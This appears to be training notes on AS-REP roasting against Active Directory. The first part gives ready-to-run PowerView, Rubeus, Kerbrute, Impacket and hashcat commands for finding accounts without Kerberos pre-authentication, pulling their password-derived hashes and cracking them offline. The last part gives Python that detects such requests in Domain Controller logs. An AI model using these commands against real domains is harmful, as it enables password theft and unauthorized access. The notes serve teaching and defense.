
asreproasting-abuse

It is possible to obtain an AS-REP (the first half of a Ticket Granting Ticket exchange) for any account that has the "Do not require Kerberos pre-authentication" setting enabled. The encrypted part of the authentication service reply is protected with a key derived from the account's password, and any domain user, or even an unauthenticated client that knows the username, can request it.

With pre-authentication, the client encrypts a timestamp with a key derived from the user's password and sends it in the AS-REQ. The Domain Controller decrypts the timestamp to validate that the correct password was used; if successful, a TGT is issued to the user for further authentication requests in the domain. If an account has pre-authentication disabled, an attacker can send an AS-REQ for the affected account and receive an AS-REP from the Domain Controller whose encrypted part is derived from that account's password. That material can be subjected to an offline password attack with a tool such as Hashcat or John the Ripper. The attack is similar to Kerberoasting, except that it targets user accounts' own keys rather than service account keys.

Enumerate accounts with the DONT_REQ_PREAUTH flag set (pre-authentication not required) using PowerView

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Request the AS-REP for a user in hashcat format using Rubeus

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Enumerate valid usernames with Kerbrute (for any user account that does not require pre-auth, Kerbrute also prints the AS-REP hash)

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Hunt for users with pre-authentication not required from Linux (Impacket)

impacket-GetNPUsers INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Crack using hashcat

-m 18200 (Kerberos 5, etype 23, AS-REP)
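The defender-side counterpart of the enumeration above, as an added example that is not part of the original page: it checks the DONT_REQ_PREAUTH bit in userAccountControl (the attribute the Get-DomainUser query selects) and scans constructed Event ID 4768 records from a Domain Controller for TGT requests made without pre-authentication and with an RC4 ticket (etype 0x17), the shape that hashcat mode 18200 cracks. The client addresses other than the DC (172.16.5.5) and the account names other than mmorgan are assumed sample values.

```python
# UserAccountControl bit for "Do not require Kerberos preauthentication" (4194304).
DONT_REQ_PREAUTH = 0x400000


def preauth_not_required(user_account_control: int) -> bool:
    """True when the account's userAccountControl has DONT_REQ_PREAUTH set.

    Such accounts should be reviewed and the flag cleared unless a documented
    (usually legacy) reason exists for it."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


# Constructed sample of Security log Event ID 4768 ("A Kerberos authentication
# ticket (TGT) was requested"), reduced to the fields that matter here.
# Pre-Authentication Type 0 = logon without pre-authentication, etype 0x17 = RC4-HMAC.
SAMPLE_4768 = [
    {"account": "jsmith", "client": "172.16.5.25", "preauth_type": "2", "etype": "0x12", "result": "0x0"},
    {"account": "mmorgan", "client": "172.16.5.225", "preauth_type": "0", "etype": "0x17", "result": "0x0"},
    {"account": "svc_legacy", "client": "172.16.5.225", "preauth_type": "0", "etype": "0x17", "result": "0x0"},
    {"account": "krbtgt", "client": "172.16.5.5", "preauth_type": "2", "etype": "0x12", "result": "0x0"},
]


def find_asrep_roast_candidates(events):
    """Return (account, client) pairs for successful TGT requests that used no
    pre-authentication and an RC4 ticket, i.e. AS-REPs that are crackable offline."""
    hits = []
    for ev in events:
        if ev["result"] == "0x0" and ev["preauth_type"] == "0" and ev["etype"].lower() == "0x17":
            hits.append((ev["account"], ev["client"]))
    return hits


def clients_requesting_many_accounts(events, threshold=2):
    """Flag client IPs that obtained no-preauth RC4 TGTs for at least `threshold`
    distinct accounts: one account may be that user's own legitimate logon, but a
    single client sweeping several accounts is the footprint of a bulk roast."""
    per_client = {}
    for account, client in find_asrep_roast_candidates(events):
        per_client.setdefault(client, set()).add(account)
    return {c: sorted(a) for c, a in per_client.items() if len(a) >= threshold}
```

A user whose account genuinely has pre-auth disabled also produces preauth type 0 on every logon, so the per-client sweep and the RC4 etype (modern clients request AES) are the stronger signals; clearing the flag and rotating the account password removes the exposure.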
